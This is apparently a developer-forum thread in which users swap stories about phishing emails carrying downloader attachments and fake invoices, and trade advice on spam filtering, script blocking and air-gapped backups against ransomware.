|
I could send you a few - well, could if I wasn't anon. Oh well.
Let me tell you, from what I've dissected from every single one of them, is they go thru about 1 or 2 levels of obfuscation of the code (eval'ing one segment to run another segment that eval's a third), plus a bunch of weird function calls (like calling one function to get a bit of a string, calling another that evals it and returns the result, calling a third to get another piece and multiply it by 5, then calling yet another to take all those pieces as arguments and return a concatenated string of substrings - that kind of stuff), ultimately what resolves/results is a URL that is then queried using an XMLHttpRequest object (aka, AJAX), or something similar - that goes out to some server (ident'd by IP or some domain), grabs an EXE, saves it, and executes it.
It's obvious from all the layers of obfuscation that the code is made this way - likely by some kind of "trojan generator" (which can probably be easily found on the dark web or elsewhere) - to both get by filters for trojans, as well as make it difficult for most people to decipher what is going on if they see the code. Ultimately, none of this is very interesting or unique - it's all a well known form of attack and documented.
Generally, though, that IP/domain has already been disabled, or the EXE has been deleted or wiped, at least in most of the cases I have tried. Only on a very few occasions have I been able to download the executable. In those cases, I try to alert the owner of the IP or domain if I can do a whois or reverse DNS search to know what provider I am dealing with - then I'll send an email to the admin contact or wherever.
I find it funny, though, when I get these emails - I always try to figure them out, hoping someday that what I'll download is a bash script or something similar; you see, my main workstation has been a linux box of one form or another since 1995 or so - and I keep hoping that these guys move on to doing things targeting Macs, Linux, or some other *nix platform, but it hasn't happened yet.
Even if it did run, the worst thing that will happen is that I have to re-image from a backup of my system - big whoop. The upside will be that I will know for certain that the "year of linux on the desktop" has finally arrived, and that linux has "jumped the shark", and I need to move to another obscure platform (maybe BSD? lolz) just to stay ahead of the game.
I'm not holding my breath on that, though - and for that, I am thankful!
|
|
|
|
|
For the last month I've also seen a massive increase in these emails and I now also get several a day. Most are easily seen as fakes but some are actually scarily good. Not good enough to convince me to open the attachment, but I'm sure many will be. Some emails appear to be copies of actual invoice emails sent from the alleged source company so everything checks out, the contact numbers, the "from address" and it looks legit. I also feel sorry for the companies that are being spoofed as I saw the rise of these emails on the BBC and they say that the companies being spoofed are being inundated with calls from angry people asking why they are chasing invoices for things they didn't order.
|
|
|
|
|
Oh yes, I forgot about the fake invoices. I get those too.
Get me coffee and no one gets hurt!
|
|
|
|
|
And the fake tax refunds, had one that looked very much like an HMRC mail, but they don't send attachments.
|
|
|
|
|
HMRC definitely don't send attachments with refunds, that's for sure.
I may not last forever but the mess I leave behind certainly will.
|
|
|
|
|
Usually I don't - I mean, U receive a lot of those e-mail but they are egregiusly filtered by Big G spam filter and end up in the Spam folder. I rarely receive spam or phishing between the good e-mails.
GCS d--- s-/++ a- C++++ U+++ P- L- E-- W++ N++ o+ K- w+++ O? M-- V? PS+ PE- Y+ PGP t++ 5? X R++ tv-- b+ DI+++ D++ G e++>+++ h--- ++>+++ y+++* Weapons extension: ma- k++ F+2 X
If you think 'goto' is evil, try writing an Assembly program without JMP. -- TNCaver
|
|
|
|
|
Just under 5% of the emails I get are junk: adverts, spam, phishing, and such like - nearly all of which I never see because it goes straight to my "junk mail" folder via the Live Mail rules I have set up. Every now and then I go through and forward phishing mails to the supposed originator.
But so far I've not seen anything like you describe.
I still do regular-and-often backups though!
Bad command or file name. Bad, bad command! Sit! Stay! Staaaay...
|
|
|
|
|
Quote: I still do regular-and-often backups though! That's the secret to survive Ransomware, isn't it?
Get me coffee and no one gets hurt!
|
|
|
|
|
Probably!
I find that if you have a backup, you probably won't need it. If you don't...
Bad command or file name. Bad, bad command! Sit! Stay! Staaaay...
|
|
|
|
|
Quote: if you have a backup, you probably won't need it Yup! And having full backups takes fear out of the equation, doesn't it? Knowing you can recover from an attack gives you peace of mind, even if it never happens.
Get me coffee and no one gets hurt!
|
|
|
|
|
Some of the latest viruses put out by the NSA implant themselves into the firmware of hard drives or bios, so that the machine is ruined. You cannot do a restore and expect to be rid of the virus.
|
|
|
|
|
I get a few dozen of these every day.
"Past due bill"
"Invoice Payment"
"Fax sent"
etc, etc...
".45 ACP - because shooting twice is just silly" - JSOP, 2010
- You can never have too much ammo - unless you're swimming, or on fire. - JSOP, 2010
- When you pry the gun from my cold dead hands, be careful - the barrel will be very hot. - JSOP, 2013
|
|
|
|
|
I only get these via one of my email accounts - the one with a bcs.org address. I would have hoped that the BCS (British Computer Society) would have been sufficiently computer savvy to host their emails on a server with decent spam filters.
|
|
|
|
|
Don't worry. Letting windows update own your computer and rule your life will solve all your problems.
Oh, wait...
No it won't. It'll just "fix" things that work.
The best process security and peace of mind is, and has always been, "don't do anything stupid".
If you use Outlook (the MS Office version), one trick is to drop suspect files into the "Junk E-mail" folder before opening them. That disables anything that could do a nasty.
But I prefer the "If in doubt, delete" method. Failing to open a genuine e-mail will not add or remove a second to or from your lifespan.
I wanna be a eunuchs developer! Pass me a bread knife!
|
|
|
|
|
Quote: But I prefer the "If in doubt, delete" method. Precisely! Same here. But maintaining good backups does not hurt. Ransom viruses are also spread by hacked "good" websites. There is always the risk of visiting a supposedly safe website that has been hacked.
Get me coffee and no one gets hurt!
|
|
|
|
|
Cornelius Henning wrote: Ransom viruses are also spread by hacked "good" websites.
This is the exact reason why I typically use Firefox with NoScript and AdBlockPlus (extended with my own personal filters). It has made the internet a pretty spartan place and there are some websites that don't even load anymore but I consider any website that will not fulfill its basic purpose without scripts or linking to 12 other sites as poor web design and not worth my time (and by basic purpose, I mean displaying information). If I need the full capabilities of a website, I turn on what is needed or switch over to Chrome. The end result is that I have ultimate control of what web content is allowed to run on my PC.
if (Object.DividedByZero == true) { Universe.Implode(); }
Meus ratio ex fortis machina. Simplicitatis de formae ac munus. -Foothill, 2016
|
|
|
|
|
Quote: It has made the internet a pretty spartan place This is so unnecessary! See this thread:
The Lounge - CodeProject[^]
Especially the item by John Simmons on HOSTS files.
Shameless plug: Also see my article about surviving the Ransom Virus.
If you are properly prepared, you can surf the Internet without fear.
Get me coffee and no one gets hurt!
|
|
|
|
|
I am in total agreement with that. All that unnecessary junk steals my bandwidth even if my browser settings block it from being rendered. If I may also play devils advocate, I also understand that many websites depend on advertisements to supply their operating capital BUT the broad spectrum tactics that most ad services utilize, showing you a million ads in hope that you click one, is reliant on quantity and not quality. In my opinion, one or two high-quality, content-targeted ads per page is more than enough. Three dozen ads trying to sell me the latest pharmaceutical product or another product that I have no need for is a waste of money on both ends and does the advertising industry a disservice.
if (Object.DividedByZero == true) { Universe.Implode(); }
Meus ratio ex fortis machina. Simplicitatis de formae ac munus. -Foothill, 2016
|
|
|
|
|
But why worry?
If your own, personal files (which are a tiny proportion of the files on your PC) and your configuration details for various programs (which don't amount to five beans' worth of disc space) are saved to other locations, then all you lose is an OS -- and I'd be quite happy to lose any OS higher than Win 7.
Just use another machine while the "attacked" one is getting everything reinstalled and copied over, and you haven't lost a peanut.
I wanna be a eunuchs developer! Pass me a bread knife!
|
|
|
|
|
Mark,
When I am attacked by Ransomware, it takes me less than 10 minutes to totally recover and clear my computer of the virus. (It has happened 3 times.) If data files are corrupted by the virus, add the time to overwrite the corrupted files from a backup that was disconnected at the time of the attack. Can you beat that? If yes: I would love to hear how!
Get me coffee and no one gets hurt!
|
|
|
|
|
Are you backing up to a NAS?
if (Object.DividedByZero == true) { Universe.Implode(); }
Meus ratio ex fortis machina. Simplicitatis de formae ac munus. -Foothill, 2016
|
|
|
|
|
Quote: Are you backing up to a NAS? Nooooo!
A Ransom virus will encrypt all files on the network, especially files in servers or a NAS! Look what happened to the hospital in LA, who was forced to pay $17,000 to have files on their network unencrypted. You need to back up to an "air gap" device, that is only briefly connected to the network while the backup is being saved. That applies to backing up data files, as well as system drive images that are vital in case of an attack.
Get me coffee and no one gets hurt!
|
|
|
|
|
Air gap backups seem like a lot of trouble for my home since there really isn't much there that I couldn't go without and now they have malware designed to target 'air gapped' computers (Microtrend article). I guess the only way to prevent such attacks is not to become a target.
if (Object.DividedByZero == true) { Universe.Implode(); }
Meus ratio ex fortis machina. Simplicitatis de formae ac munus. -Foothill, 2016
|
|
|
|
|
Quote: I guess the only way to prevent such attacks is not to become a target Obviously the choice is yours. Good luck
Get me coffee and no one gets hurt!
|
|
|
|
|
Unfortunately, C, I can't give you timing data, because I've never been daft enough to get infected in the first place!
[Ambles away, whistling the theme to Goldfinger)
I wanna be a eunuchs developer! Pass me a bread knife!
|
|
|
|